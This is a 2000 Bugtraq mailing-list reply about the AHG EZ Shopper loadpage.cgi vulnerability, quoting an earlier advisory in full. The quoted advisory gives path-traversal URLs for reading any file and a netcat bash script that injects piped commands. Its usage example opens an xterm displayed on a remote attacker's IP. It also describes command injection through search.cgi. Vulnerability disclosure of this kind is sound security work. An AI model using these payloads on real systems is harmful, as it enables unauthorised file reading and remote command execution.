[18142] in bugtraq
Re: NSFOCUS SA2000-09 : AHG EZshopper Loadpage.cgi File
daemon@ATHENA.MIT.EDU (Marshal)
Mon Dec 18 19:31:36 2000
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id: <3A3B3FCC.8946D71D@marshal-soft.com>
Date: Sat, 16 Dec 2000 11:11:24 +0100
Reply-To: Marshal <marshal@MARSHAL-SOFT.COM>
From: Marshal <marshal@MARSHAL-SOFT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
I also contacted AHG about it a long time ago, it seems that they had an
update.
This update is still vuln, loadpage is possible to view any file above
the specified $root=
dir in the config file. but execution and viewing files with search is
no longer possible.
I contacted them about it, they did nothing.
But yes, this advisory is old news.
suid@SNEAKERZ.ORG wrote:
>
> Uhh... guys i dont really mean to dis you but...
> It sometimes pays to research a bit before releasing advisories.
> Here is something i posted (to bugtraq no less) on the 28 of feb this year.
>
> k thx bye
>
> suid@suid.kg - EZ Shopper 3.0 remote command execution.
>
> Software: EZ Shopper 3.0
> URL: http://www.ahg.com/software.htm#ezshopper
> Version: Version 3.0
> Platforms: Unix, NT
> Type: CGI, Input validation problem
> Vendor status: Notified 26/02/2000
> Date: 26/02/2000
>
> Summary:
>
> Anyone can execute any command on the remote system with
> the priveleges of the web server. Anyone can read any file
> on the remote system which the webserver has access to.
>
> Vulnerability:
>
> The perl code does no input validation and performs an
> open() on a user supplied input.
>
> Exploit:
>
> (1) loadpage.cgi - view any file.
>
> Firstly using your web browser find the current path (cwd):
>
> http://www.example.com/cgi-bin/loadpage.cgi?user_id=1&file=XYZ
>
> You will receive an error message like:
>
> Cannot open file /home/www/shop/XYZ
>
> Now simply use (example based on the above cwd):
>
> http://www.example.com/cgi-bin/loadpage.cgi?
> user_id=1&file=../../<path>/<file>
>
> (2) loadpage.cgi - execute any command.
>
> This example shell script uses netcat to communicate with a
> HTTP proxy and exploit the script:
>
> ------------------------CUT------------------------
>
> #!/bin/bash
> echo -e "GET http://www.example.com/cgi-bin/loadpage.cgi?
> user_id=1&file=|"$1"| HTTP/1.0\n\n" | nc proxy.server.com 8080
>
> ------------------------CUT------------------------
>
> A usage example would be:
>
> $ ./ezhack.sh /usr/X11R6/bin/xterm%20-display%
> 20123.123.123.123:0
>
> (3) search.cgi - view files (retarded tho) and execute commands.
>
> Simply replace the database field with piped commands or path/filename.
>
> http://www.example.com/cgi-bin/search.cgi?
> user_id=1&database=<insert here>&template=<or insert here>&distinct=1
>
> Note if you use the database field a valid template is probably needed
> and vice versa.
>
> Workaround:
>
> The vendor, AHG Inc, has released a fixed version, download it from
> their website and install the fixed version.
--
Groeten,
Marshal
[ url : http://www.startplaza.nu | security news & links ]
[ url : http://www.heknet.com | security news & exploits ]
